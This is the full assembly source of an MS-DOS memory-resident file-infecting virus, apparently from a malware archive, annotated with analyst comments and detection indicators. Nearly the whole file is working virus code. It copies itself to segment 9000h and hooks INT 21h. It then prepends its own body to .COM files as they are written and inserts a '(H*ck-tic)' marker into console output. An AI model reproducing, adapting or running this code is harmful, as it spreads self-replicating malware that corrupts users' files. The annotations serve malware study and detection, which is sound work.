MalwareSourceCode/MSDOS/H-Index/Virus.MSDOS.Unknown.hack-res.asm
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00


; ---------------------------------------------------------------------
; Analyst notes: installer stage (16-bit DOS .COM image, MASM/TASM syntax).
; Copies LEN bytes of this code to the hard-coded segment 9000h, saves the
; current INT 21h vector at 9000h:int21, points INT 21h at 9000h:infect,
; then builds a 4-byte copy stub at offset 0FCh that moves the bytes which
; follow this code down to 100h and runs them.
; No DOS memory-allocation call appears in this listing; the destination
; segment is simply written to.
; Artefacts a responder can look for, all taken from the code below:
;   - INT 21h vector (0000:0084h) whose offset word equals `offset infect`
;     and whose segment word is 9000h;
;   - a program image whose first byte is 0B8h (opcode of `mov ax,9000h`),
;     which is the marker the INT 21h handler in this file tests for.
; ---------------------------------------------------------------------
tic segment
org 100h
assume cs:tic, ds:tic, es:tic
;
; LEN = number of bytes from the image start (100h) up to the int21 dword.
len equ offset int21-100h ;LENGTH OF VIRUS CODE
;
start: mov ax,9000h ;MOVE VIRUS CODE UP
mov es,ax
; DI = SI: relies on whatever SI holds at program entry; it is never set in
; this listing (presumably 100h under DOS -- confirm for the system analysed).
mov di,si
mov cx,len
; Copy LEN bytes DS:SI -> ES:DI, i.e. into segment 9000h at the same offset.
rep movsb
; CX is 0 after REP MOVSB, so this addresses the interrupt vector table.
mov ds,cx ;DS = 0
; 84h = 21h * 4, the IVT slot for INT 21h.
mov si,84h ;INT 21 VECTOR
mov di,offset int21
; Saved for the `pop si` at exit: offset of the first byte after the code.
push di
mov dx,offset infect
lodsw ;SAVE ORIGINAL VECTOR
; Residency check compares only the offset word of the vector with
; `offset infect`; the segment word is not compared.
cmp ax,dx ;VIRUS PROBABLY ALREADY RESIDENT
je exit
; Store offset then segment of the previous handler at ES:int21 (9000h:int21).
stosw
lodsw
stosw
; DS = 9000h so that DS:DX = 9000h:infect for the call below.
push es
pop ds
; AH=25h, AL=21h: DOS "set interrupt vector" for INT 21h to DS:DX.
mov ax,2521h ;REVECTOR TO VIRUS
int 21h
exit: push cs ;RESTORE SEGMENT REGISTERS
pop ds
push cs
pop es
; SI = offset int21 (pushed above): source of the bytes to move down.
pop si ;SI = END OF VIRUS CODE
mov di,0fch
; 0FCh becomes the return address consumed by the RET at the end.
push di ;RETURN HERE
; Stored little-endian at 0FCh-0FDh: bytes 0ACh, 0AAh.
mov ax,0aaach ;LODSB/STOSB INSTRUCTIONS
stosw
; Stored at 0FEh-0FFh: bytes 0E2h, 0FCh (LOOP, displacement -4 -> 0FCh).
mov ax,0fce2h ;LOOP TO ADDRESS INSTRUCTIONS
stosw
; DI is now 100h. CH = 0FEh sets the high byte of the LOOP count; CL is not
; written here (it is 0 after the REP MOVSB unless the INT 21h call changed
; it -- presumably preserved, TODO confirm).
mov ch,0feh
; Transfers to the stub at 0FCh; when its LOOP ends, execution falls
; through to 100h, where the moved bytes now sit.
ret ;MOVE CODE AND RUN PROGRAM
;
; ---------------------------------------------------------------------
; Analyst notes: replacement INT 21h handler.
; Saves flags, AX, CX, DX, SI and DS, acts only on AH=40h (write via
; handle), and always restores the saved state and chains to the previous
; handler through the far pointer stored at cs:[int21].
; Two behaviours on AH=40h:
;   - BX = 1 (standard output): first writes the 12-byte string at `string`
;     to the same handle, then lets the caller's write proceed.
;   - any other handle: inspects the first byte of the caller's buffer at
;     DS:DX; if it is 0EBh (and not 0B8h) it first writes LEN bytes of its
;     own code to the handle, then lets the caller's write proceed, so the
;     written data ends up prefixed by this code.
; Observable effects: the marker string appearing in console output, and
; files written through INT 21h/40h that start with 0B8h followed by
; content that originally began with 0EBh.
; ---------------------------------------------------------------------
infect: pushf
push ax
push cx
push dx
push si
push ds
cmp ah,40h ;WRITE FUNC?
jne done
; Handle 1 is standard output.
cmp bx,1
je mes
mov si,dx ;DS:DX = WRITE BUFFER
; AL = first byte of the data the caller is about to write.
lodsb
; 0B8h is the opcode byte of `mov ax,9000h`, the first instruction at `start`.
cmp al,0b8h ;ALREADY INFECTED?
je done
; 0EBh is the short-JMP opcode; used here as the only "is a .COM" test.
cmp al,0ebh ;PROBABLY .COM
jne done
mov cx,len ;LENGTH OF VIRUS
; Only DH is set; DL keeps the caller's value, so DX = 100h only if DL was 0.
mov dh,1 ;DX ASSUMED TO BE 0
; Shared tail for both paths: DS = CS so DS:DX points into this segment.
hack: push cs
pop ds
; PUSHF + far CALL through the saved vector imitates an INT 21h to the
; previous handler with AH=40h, the caller's BX, and the CX/DX set above.
pushf
call cs:[int21] ;WRITE VIRUS
; The result of that extra write is not checked; all registers saved on
; entry are restored before chaining.
done: pop ds
pop si
pop dx
pop cx
pop ax
popf ;CONTINUE INTERRUPT
; Far jump to the previous handler, which services the caller's request.
jmp cs:[int21]
; Standard-output path: 12 is the length of the literal at `string`.
mes: mov cx,12
mov dx,offset string
jmp short hack
; 12-byte marker text the handler writes ahead of every INT 21h/40h call on
; handle 1; usable as a string signature for this sample.
string db ' (H*ck-tic) '
;
; Dword that ends the region counted by LEN. In the copy placed in segment
; 9000h it is overwritten with the previous INT 21h vector (offset, then
; segment). Its initial value 000000C3h puts the byte 0C3h (RET opcode) at
; the position the exit stub moves down to 100h.
int21 dd 0c3h ;STANDALONE VIRUS RETURNS
tic ends
end start

; ------------------------------------------------------------------------
; ------> and Remember Don't Forget to Call <------
; ------> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <------
; ------------------------------------------------------------------------